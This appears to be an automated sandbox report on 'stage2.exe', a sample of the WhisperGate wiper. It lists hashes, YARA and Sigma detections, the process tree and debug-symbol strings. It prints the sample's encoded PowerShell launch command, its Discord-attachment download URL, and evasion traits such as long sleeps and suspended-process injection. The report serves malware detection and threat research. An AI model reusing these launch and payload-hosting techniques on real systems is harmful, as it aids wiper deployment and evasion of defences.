Loading ...

Play interactive tourEdit tour

Windows Analysis Report stage2.exe

Overview

General Information

Sample Name:stage2.exe
Analysis ID:553986
MD5:14c8482f302b5e81e3fa1b18a509289d
SHA1:16525cb2fd86dce842107eb1ba6174b23f188537
SHA256:dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Tags:DEV-0586exeWhisperGate
Infos:

Most interesting Screenshot:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected MSILDownloaderGeneric
Sigma detected: Suspicious Encoded PowerShell Command Line
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Sigma detected: Suspicious Execution of Powershell with Base64
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • stage2.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\stage2.exe" MD5: 14C8482F302B5E81E3FA1B18A509289D)
    • powershell.exe (PID: 7160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7140 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 492 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
stage2.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x3cf5:$x1: https://cdn.discordapp.com/attachments/
stage2.exeAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
  • 0x3da5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3e77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3cc8:$s1: xownxloxadDxatxxax
  • 0x3de3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3cf5:$s3: https://cdn.discordapp.com/attachments/
  • 0x8194:$s4: fffxfff.fff
  • 0x115c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1375:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x1bec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x14db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
stage2.exeMAL_Unknown_Discord_Characteristics_Jan22_1Detects unknown malware with a few indicators also found in Wiper malwareFlorian Roth
  • 0x3cc8:$x1: xownxloxadDxatxxax
  • 0x3cf5:$s2: https://cdn.discordapp.com/attachments/

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000000.439887170.0000000000EA2000.00000002.00020000.sdmpAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
00000001.00000002.480052318.0000000000EA2000.00000002.00020000.sdmpAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
00000001.00000000.437666808.0000000000EA2000.00000002.00020000.sdmpAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
00000001.00000000.271766492.0000000000EA2000.00000002.00020000.sdmpAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
Process Memory Space: stage2.exe PID: 7084JoeSecurity_MSIL_Downloader_GenericYara detected MSIL_Downloader_GenericJoe Security
    Click to see the 2 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    1.2.stage2.exe.ea0000.0.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x3cf5:$x1: https://cdn.discordapp.com/attachments/
    1.2.stage2.exe.ea0000.0.unpackAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
    • 0x3da5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
    • 0x3e77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
    • 0x3cc8:$s1: xownxloxadDxatxxax
    • 0x3de3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    • 0x3cf5:$s3: https://cdn.discordapp.com/attachments/
    • 0x8194:$s4: fffxfff.fff
    • 0x115c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
    • 0x1375:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
    • 0x1bec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
    • 0x14db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
    1.2.stage2.exe.ea0000.0.unpackMAL_Unknown_Discord_Characteristics_Jan22_1Detects unknown malware with a few indicators also found in Wiper malwareFlorian Roth
    • 0x3cc8:$x1: xownxloxadDxatxxax
    • 0x3cf5:$s2: https://cdn.discordapp.com/attachments/
    1.0.stage2.exe.ea0000.0.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x3cf5:$x1: https://cdn.discordapp.com/attachments/
    1.0.stage2.exe.ea0000.0.unpackAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
    • 0x3da5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
    • 0x3e77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
    • 0x3cc8:$s1: xownxloxadDxatxxax
    • 0x3de3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    • 0x3cf5:$s3: https://cdn.discordapp.com/attachments/
    • 0x8194:$s4: fffxfff.fff
    • 0x115c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
    • 0x1375:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
    • 0x1bec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
    • 0x14db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
    Click to see the 7 entries

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
    Source: Process startedAuthor: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\stage2.exe" , ParentImage: C:\Users\user\Desktop\stage2.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, ProcessId: 7160
    Sigma detected: Suspicious Execution of Powershell with Base64Show sources
    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\stage2.exe" , ParentImage: C:\Users\user\Desktop\stage2.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, ProcessId: 7160
    Sigma detected: Non Interactive PowerShellShow sources
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\stage2.exe" , ParentImage: C:\Users\user\Desktop\stage2.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, ProcessId: 7160
    Sigma detected: T1086 PowerShell ExecutionShow sources
    Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132868886483971359.7160.DefaultAppDomain.powershell

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: stage2.exeVirustotal: Detection: 44%Perma Link
    Source: stage2.exeReversingLabs: Detection: 48%
    Machine Learning detection for sampleShow sources
    Source: stage2.exeJoe Sandbox ML: detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0 CryptReleaseContext,13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0 CryptReleaseContext,13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0 CryptReleaseContext,13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0 CryptReleaseContext,13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0 CryptReleaseContext,13_2_07A341F0
    Source: stage2.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
    Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49752 version: TLS 1.2
    Source: stage2.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\System.pdb& source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.446729518.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.446463538.0000000000D7F000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448927179.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448308862.0000000004D01000.00000004.00000001.sdmp
    Source: Binary string: ncryptsslp.pdb sd$ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\user\Desktop\stage2.PDBx source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: System.Configuration.pdbk source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasapi32.pdbJ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: clr.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Users\user\Desktop\stage2.PDBX source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: msasn1.pdbz source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: C:\Users\user\Desktop\stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: schannel.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdbQ2 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: mscorlib.pdb<7 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
    Source: Binary string: i.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
    Source: Binary string: mscoree.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: nsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: gpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: clrjit.pdb8Std source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbf source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: iertutil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: nsi.pdb+: source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
